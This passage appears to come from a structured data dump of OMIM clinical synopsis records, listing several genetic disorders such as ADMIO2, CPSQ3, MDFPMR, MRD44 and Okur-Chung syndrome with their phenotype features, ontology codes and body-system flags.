'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617006,
'prefix': '#',
'preferredTitle': 'AUTOIMMUNE DISEASE, MULTISYSTEM, INFANTILE-ONSET, 2; ADMIO2',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'abdomenGastrointestinal': 'Inflammatory colitis {UMLS C4314158}',
'genitourinaryKidneys': '''Nephrotic syndrome (1 patient) {UMLS C4014460} {HPO HP:0000100 C0027726};\nIgG deposition (1 patient) {UMLS C4314161};\nEffacement of podocytes (1 patient) {UMLS C4314160};\nMinimal change disease (1 patient) {UMLS C4314159} {HPO HP:0012579 C0027721};\nProteinuria {SNOMEDCT:29738008,231860006} {ICD10CM:R80,R80.9} {ICD9CM:791.0} {UMLS C4554346,C1279888,C0033687,C1962972 HP:0000093} {HPO HP:0000093 C0033687}''',
'skinNailsHairSkin': '''Blistering skin disease {UMLS C4314154};\nBullous pemphigoid {SNOMEDCT:77090002,86142006} {ICD10CM:L12.0,L12,L12.9} {ICD9CM:694.5} {UMLS C0030805}''',
'endocrineFeatures': 'Autoimmune hypothyroidism (1 patient) {UMLS C4314162}',
'hematology': 'Autoantibodies to factor VIII (1 boy) {UMLS C4314155}',
'immunology': '''Autoimmune disorder {SNOMEDCT:85828009} {ICD10CM:M30-M36} {UMLS C0004364,C4553718 HP:0002960} {HPO HP:0002960 C0004364};\nAutoantibody production {UMLS C4314157};\nDecreased numbers of CD8+ T cells {UMLS C1839305 HP:0005415};\nDiminished proliferative response of T cells {UMLS C4314156}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nA brother and sister from 1 family have been reported (last curated June 2016) {UMLS C4314152};\nBoth patients had resolution of symptoms after hematopoietic stem cell transplantation {UMLS C4314151}''',
'molecularBasis': 'Caused by mutation in the zeta-chain-associated protein kinase gene (ZAP70, {176947.0006})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': True,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': True,
'hematologyExists': True,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617008,
'prefix': '#',
'preferredTitle': 'CEREBRAL PALSY, SPASTIC QUADRIPLEGIC, 3; CPSQ3',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckHead': 'Microcephaly, borderline {UMLS C4314148}',
'headAndNeckEyes': '''Nystagmus {SNOMEDCT:563001} {ICD10CM:H55.0,H55.00} {ICD9CM:379.50} {UMLS C1963184,C4554036,C0028738 HP:0000639} {HPO HP:0000639 C0028738};\nStrabismus {SNOMEDCT:22066006,128602000} {ICD10CM:H50.40,H50.9} {ICD9CM:378.30} {UMLS C2020541,C1423541,C0038379 HP:0032012,HP:0000486} {HPO HP:0000486 C0038379};\nSupranuclear gaze palsy {SNOMEDCT:420675003} {UMLS C1720037 HP:0000605} {HPO HP:0000605 C1720037};\nExotropia {SNOMEDCT:399252000,399054005} {ICD10CM:H50.1,H50.10} {ICD9CM:378.1,378.10} {UMLS C0015310 HP:0000577} {HPO HP:0000577 C0015310}''',
'abdomenGastrointestinal': 'Dysphagia {SNOMEDCT:40739000,288939007} {ICD10CM:R13.1,R13.10} {ICD9CM:787.2,787.20} {UMLS C0011168,C1560331 HP:0002015,HP:0200136} {HPO HP:0002015 C0011168}',
'neurologicCentralNervousSystem': '''Global developmental delay {SNOMEDCT:224958001} {ICD10CM:F88} {UMLS C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nSpastic quadriplegia {SNOMEDCT:192965001} {UMLS C0426970 HP:0002510} {HPO HP:0002510 C0426970};\nSpastic diplegia {SNOMEDCT:281411007} {ICD10CM:G80.1} {UMLS C0023882 HP:0001264} {HPO HP:0001264 C0023882};\nPyramidal tract signs {SNOMEDCT:14648003} {UMLS C0234132 HP:0007256} {HPO HP:0007256 C0234132};\nCognitive impairment {SNOMEDCT:386806002} {UMLS C0338656 HP:0100543} {HPO HP:0100543 C0338656,C0683322};\nPoor speech {UMLS C1848207 HP:0002465} {HPO HP:0002465 C1848207,C4280574};\nSeizures (1 patient) {UMLS C2749200} {HPO HP:0001250 C0014544,C0036572};\nGray matter heterotopia (in 1 patient) {UMLS C4314150} {HPO HP:0002282 C0008519};\nT2-weighted hyperintensities (in 2 patients) {UMLS C4314149}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nVariable severity {UMLS C1861403 HP:0003828} {HPO HP:0003828 C1861403,C1866862};\nOne consanguineous Jordanian family with 4 affected sibs has been reported (last curated June 2016) {UMLS C4314146}''',
'molecularBasis': 'Caused by mutation in the adducin 3 gene (ADD3, {601568.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617011,
'prefix': '#',
'preferredTitle': 'MACROCEPHALY, DYSMORPHIC FACIES, AND PSYCHOMOTOR RETARDATION; MDFPMR',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthHeight': 'Tall stature {SNOMEDCT:248328003} {UMLS C0241240 HP:0000098} {HPO HP:0000098 C0241240}',
'growthWeight': 'Increased birth weight {UMLS C2748451}',
'growthOther': '''Somatic overgrowth apparent since birth {UMLS C4314143};\nAsthenic habitus as adult {UMLS C4314142}''',
'headAndNeckHead': 'Macrocephaly {SNOMEDCT:19410003,12138000} {ICD10CM:Q75.3} {UMLS C2243051,C0221355 HP:0001355,HP:0000256} {HPO HP:0000256 C4083076,C4255213,C4280663,C4280664} {EOM ID:1d53660e657259f0 IMG:Macrocephaly-small.jpg}',
'headAndNeckFace': '''Prominent forehead {UMLS C1837260 HP:0011220} {HPO HP:0011220 C1837260,C1867446} {EOM ID:510a51e4083c1d6f IMG:Forehead,Prominent-small.jpg};\nFrontal bossing {SNOMEDCT:90145001} {UMLS C0221354 HP:0002007} {HPO HP:0002007 C0221354} {EOM ID:a223995bdef3e8d6 IMG:Frontal_Bossing-small.jpg};\nLong face {UMLS C1836047 HP:0000276} {HPO HP:0000276 C1836047} {EOM ID:811c4c37ac5a130b IMG:Face,Long-small.jpg};\nHypotonic face {UMLS C3808179};\nTriangular face {UMLS C1835884 HP:0000325} {HPO HP:0000325 C1835884} {EOM ID:6f437512a502776b IMG:Face,Triangular-small.jpg};\nMalar hypoplasia {UMLS C1858085 HP:0000272} {HPO HP:0000272 C1858085,C4280651} {EOM ID:81db216382f501fc IMG:Malar_Flattening-small.jpg};\nPrognathism {SNOMEDCT:22810007,72855002,109504005} {ICD10CM:M26.213} {ICD9CM:524.23} {UMLS C0033324,C0399526 HP:0000303} {HPO HP:0000303 C0302501,C0399526,C2227134,C4280644,C4280645} {EOM ID:cf3eb35245d52feb IMG:Prognathism-small.jpg}''',
'headAndNeckEars': '''Macrotia {SNOMEDCT:69056000} {ICD10CM:Q17.1} {ICD9CM:744.22} {UMLS C0152421 HP:0000400} {HPO HP:0000400 C0152421,C0554972,C1835581,C1848570,C1850189,C1855062,C1860838};\nLarge ears {SNOMEDCT:275480001} {UMLS C0554972 HP:0000400} {HPO HP:0000400 C0152421,C0554972,C1835581,C1848570,C1850189,C1855062,C1860838};\nLow-set ears {SNOMEDCT:95515009} {ICD10CM:Q17.4} {UMLS C0239234 HP:0000369} {HPO HP:0000369 C0239234};\nPosteriorly rotated ears {SNOMEDCT:253251006} {UMLS C0431478 HP:0000358} {HPO HP:0000358 C0431478}''',
'headAndNeckEyes': '''Hypertelorism {SNOMEDCT:22006008} {ICD10CM:Q75.2} {ICD9CM:376.41} {UMLS C0020534 HP:0000316} {HPO HP:0000316 C0020534} {EOM ID:71d9f1be67c7f8b6 IMG:Eyes,Widely_Spaced-small.jpg};\nDownslanting palpebral fissures {SNOMEDCT:246800008} {UMLS C0423110 HP:0000494} {HPO HP:0000494 C0423110};\nUpslanting palpebral fissures {SNOMEDCT:246799009} {UMLS C0423109 HP:0000582} {HPO HP:0000582 C0423109};\nProptosis {SNOMEDCT:18265008} {ICD10CM:H05.20} {ICD9CM:376.30} {UMLS C0015300 HP:0000520} {HPO HP:0000520 C0015300,C1837760,C1848490,C1862425} {EOM ID:765f49f1e824f0d2 IMG:Proptosis-small.jpg};\nSparse eyebrows {SNOMEDCT:422441003} {UMLS C0578682,C1832446 HP:0045075,HP:0002223} {HPO HP:0045075}''',
'headAndNeckNose': 'Prominent nasal bridge {UMLS C1854113 HP:0000426} {HPO HP:0000426 C1854113,C4230640} {EOM ID:a7571049e570041c IMG:Nasal_Bridge,Prominent-small.jpg}',
'headAndNeckMouth': 'High-arched palate {SNOMEDCT:27272007} {ICD10CM:Q38.5} {UMLS C0240635 HP:0000218} {HPO HP:0000218 C0240635}',
'headAndNeckNeck': 'Long neck {UMLS C1839816 HP:0000472} {HPO HP:0000472 C1839816} {EOM ID:7c963baf8e0fd48f IMG:Neck,Long-small.jpg}',
'chestExternalFeatures': 'Asymmetric thorax {UMLS C4539568}',
'skeletal': '''Normal bone age {SNOMEDCT:123981005} {UMLS C1276343};\nJoint laxity {SNOMEDCT:298203008} {UMLS C0086437 HP:0001388} {HPO HP:0001388 C0086437,C0158359};\nJoint limitation {UMLS C1842225}''',
'skeletalSpine': '''Kyphosis {SNOMEDCT:71311003,413428007,414564002} {ICD10CM:M40.20,Q76.41} {ICD9CM:737.1} {UMLS C0022822,C0022821,C2115817,C0265673,C4552747 HP:0002808} {HPO HP:0002808 C0022821,C1845112};\nScoliosis {SNOMEDCT:298382003,20944008,111266001} {ICD10CM:Q67.5,M41,M41.9} {UMLS C0559260,C0036439,C4552773,C0700208 HP:0002650} {HPO HP:0002650 C0037932,C0700208};\nLordosis {SNOMEDCT:249710008,61960001} {ICD10CM:M40.5} {UMLS C4554632,C0024003,C0599412 HP:0003307} {HPO HP:0003307 C0024003}''',
'skeletalLimbs': 'Elongated limbs {UMLS C4314141}',
'skeletalHands': '''Large hands {SNOMEDCT:249752003} {UMLS C0426870 HP:0001176} {HPO HP:0001176 C0426870};\nArachnodactyly {SNOMEDCT:62250003} {UMLS C0003706 HP:0001519,HP:0001166} {HPO HP:0001166 C0003706}''',
'skeletalFeet': '''Large feet {SNOMEDCT:299462005} {UMLS C0576225 HP:0001833} {HPO HP:0001833 C0576225};\nFlat feet {SNOMEDCT:53226007,203534009} {ICD10CM:M21.4} {ICD9CM:734} {UMLS C0016202,C0264133 HP:0001763} {HPO HP:0001763 C0016202,C0264133}''',
'muscleSoftTissue': 'Hypotonia {SNOMEDCT:398152000,398151007} {UMLS C0026827,C1858120 HP:0001290,HP:0001252} {HPO HP:0001290 C1858120}',
'neurologicCentralNervousSystem': '''Global developmental delay {SNOMEDCT:224958001} {ICD10CM:F88} {UMLS C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nIntellectual disability {SNOMEDCT:110359009,228156007} {ICD9CM:317-319.99} {UMLS C3714756 HP:0001249} {HPO HP:0001249 C0025362,C0423903,C0917816,C1843367,C3714756,C4020876};\nPoor or absent speech {UMLS C3278212};\nAtaxic gait {SNOMEDCT:25136009} {ICD10CM:R26.0} {UMLS C0751837 HP:0002066} {HPO HP:0002066 C0751837};\nSeizures (in some patients) {UMLS C2749939} {HPO HP:0001250 C0014544,C0036572};\nVentriculomegaly {SNOMEDCT:413808003} {UMLS C1531647,C3278923 HP:0002119} {HPO HP:0002119 C3278923};\nHydrocephalus (in some patients) {UMLS C3550614} {HPO HP:0000238 C0020255};\nMegalencephaly {SNOMEDCT:19410003,9740002} {ICD10CM:Q75.3,Q04.5} {UMLS C2720434,C0221355 HP:0001355} {HPO HP:0001355 C0221355};\nCortical atrophy (in some patients) {UMLS C4012272} {HPO HP:0002120 C0235946};\nCerebellar atrophy (1 patient) {UMLS C3552260} {HPO HP:0001272 C0262404,C0740279,C4020873};\nThick corpus callosum (1 patient) {UMLS C4314145} {HPO HP:0007074 C1835194};\nEnlarged white matter (1 patient) {UMLS C4314144}''',
'neurologicBehavioralPsychiatricManifestations': 'Poor social interaction {SNOMEDCT:88598008} {ICD10CM:F80.82} {UMLS C0150080 HP:0000735}',
'miscellaneous': 'Onset at birth {UMLS C1836142 HP:0003577} {HPO HP:0003577 C1836142,C2752013}',
'molecularBasis': 'Caused by mutation in the HECT domain and RCC1-like domain 1 gene (HERC1, {605109.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': True,
'growthOtherExists': True,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': True,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': True,
'skeletalHandsExists': True,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': True,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617061,
'prefix': '#',
'preferredTitle': 'MENTAL RETARDATION, AUTOSOMAL DOMINANT 44; MRD44',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'headAndNeckHead': 'Microcephaly (in most patients, up to -5.4 SD) {UMLS C4313938} {HPO HP:0000252 C0424688} {EOM ID:8ae2118220c1308f IMG:Microcephaly-small.jpg}',
'headAndNeckFace': '''High forehead {UMLS C0239676 HP:0000348} {HPO HP:0000348 C0239676,C2677762} {EOM ID:f635aa5bd991cae4 IMG:Hairline,High_Anterior-small.jpg};\nPointed features {UMLS C4313937};\nMicrognathia {SNOMEDCT:32958008} {UMLS C0025990 HP:0000347} {HPO HP:0000347 C0025990,C0240295,C1857130} {EOM ID:8bbf61b4ad7ca2ef IMG:Micrognathia-small.jpg};\nPointed jaw {UMLS C2678198};\nAsymmetric face {SNOMEDCT:15253005} {UMLS C1306710 HP:0000324}''',
'headAndNeckEars': 'Large ears {SNOMEDCT:275480001} {UMLS C0554972 HP:0000400} {HPO HP:0000400 C0152421,C0554972,C1835581,C1848570,C1850189,C1855062,C1860838}',
'headAndNeckEyes': '''Upslanting palpebral fissures {SNOMEDCT:246799009} {UMLS C0423109 HP:0000582} {HPO HP:0000582 C0423109};\nDownslanting palpebral fissures {SNOMEDCT:246800008} {UMLS C0423110 HP:0000494} {HPO HP:0000494 C0423110};\nSynophrys {SNOMEDCT:253207002} {UMLS C0431447 HP:0000664} {HPO HP:0000664 C0431447} {EOM ID:5e417df50b2316f4 IMG:Synophrys-small.jpg};\nThick eyebrows {UMLS C1853487 HP:0000574} {HPO HP:0000574 C1853487}''',
'headAndNeckNose': '''Straight nose {UMLS C3554802};\nShort nose {UMLS C1854114 HP:0003196} {HPO HP:0003196 C0426414,C1854114} {EOM ID:daeb9fb85b0b970f IMG:Nose,Short-small.jpg}''',
'headAndNeckMouth': '''High palate {SNOMEDCT:27272007} {ICD10CM:Q38.5} {UMLS C0240635 HP:0000218} {HPO HP:0000218 C0240635} {EOM ID:51755789482fe3a8 IMG:Palate,High-small.jpg};\nFull lips {SNOMEDCT:248177001} {UMLS C0424485,C1836543 HP:0012471} {HPO HP:0012471 C1836543}''',
'headAndNeckTeeth': '''Dental crowding {SNOMEDCT:12351004} {ICD9CM:524.31} {UMLS C0040433 HP:0000678} {HPO HP:0000678 C0040433,C1317785,C4280617,C4280618} {EOM ID:997c7a12a3ac4f88 IMG:Dental_Crowding-small.jpg};\nHypodontia {SNOMEDCT:64969001} {ICD10CM:K00.0} {UMLS C0020608 HP:0000668} {HPO HP:0000668 C0020608}''',
'abdomenGastrointestinal': 'Feeding difficulties (in some patients) {UMLS C3276035} {HPO HP:0011968 C0232466}',
'skeletalSpine': 'Kyphosis (in some patients) {UMLS C3553093} {HPO HP:0002808 C0022821,C1845112}',
'skeletalHands': '''Brachydactyly {SNOMEDCT:43476002} {UMLS C0221357 HP:0001156} {HPO HP:0001156 C0221357};\nTapering fingers {SNOMEDCT:249768009} {UMLS C0426886 HP:0001182} {HPO HP:0001182 C0426886};\nBroad interphalangeal joints {UMLS C3808870};\nClinodactyly {SNOMEDCT:17268007} {UMLS C4551485,C0265610 HP:0030084,HP:0040019} {HPO HP:0030084 C0265610,C4280304} {EOM ID:483af428f909c76c IMG:Clinodactyly-small.jpg}''',
'skeletalFeet': '2-3 toe syndactyly {UMLS C4551570 HP:0004691} {HPO HP:0004691 C0432040}',
'neurologicCentralNervousSystem': '''Intellectual disability, borderline to moderate {UMLS C4313939};\nLearning difficulties {SNOMEDCT:161129001} {UMLS C0424939};\nDelayed motor development, mild {UMLS C1844429} {HPO HP:0001270 C1854301,C4020874};\nDelayed speech {SNOMEDCT:229721007} {UMLS C0241210 HP:0000750} {HPO HP:0000750 C0023012,C0233715,C0241210,C0454644};\nPoor speech {UMLS C1848207 HP:0002465} {HPO HP:0002465 C1848207,C4280574};\nSeizures (1 patient) {UMLS C2749200} {HPO HP:0001250 C0014544,C0036572}''',
'neurologicBehavioralPsychiatricManifestations': '''Autistic-like features {UMLS C2749029};\nAttention deficit-hyperactivity disorder {SNOMEDCT:406506008,7461003} {ICD10CM:F90,F90.9} {ICD9CM:314.9,314.01,314} {UMLS C1263846 HP:0007018} {HPO HP:0007018 C1263846};\nAggressive behavior {SNOMEDCT:61372001} {UMLS C0001807 HP:0006919,HP:0000718} {HPO HP:0000718 C0001807,C0424323,C1457883};\nObsessive-compulsive behavior {SNOMEDCT:12479006} {ICD10CM:R46.81} {UMLS C0600104 HP:0000722} {HPO HP:0000722 C0028768,C0600104}''',
'immunology': 'Recurrent infections (in some patients) {UMLS C3809599} {HPO HP:0002719 C0239998}',
'miscellaneous': 'Variable phenotype {UMLS C1837514 HP:0003812} {HPO HP:0003812 C1837514,C1839039,C1850667,C1866210}',
'molecularBasis': 'Caused by mutation in the triple functional domain gene (TRIO, {601893.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': True,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': True,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': True,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617062,
'prefix': '#',
'preferredTitle': 'OKUR-CHUNG NEURODEVELOPMENTAL SYNDROME; OCNDS',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'growthOther': 'Failure to thrive (in some patients) {UMLS C3278624} {HPO HP:0001508 C0231246,C2315100}',
'headAndNeckHead': 'Microcephaly (3 patients) {UMLS C4313934} {HPO HP:0000252 C0424688} {EOM ID:8ae2118220c1308f IMG:Microcephaly-small.jpg}',
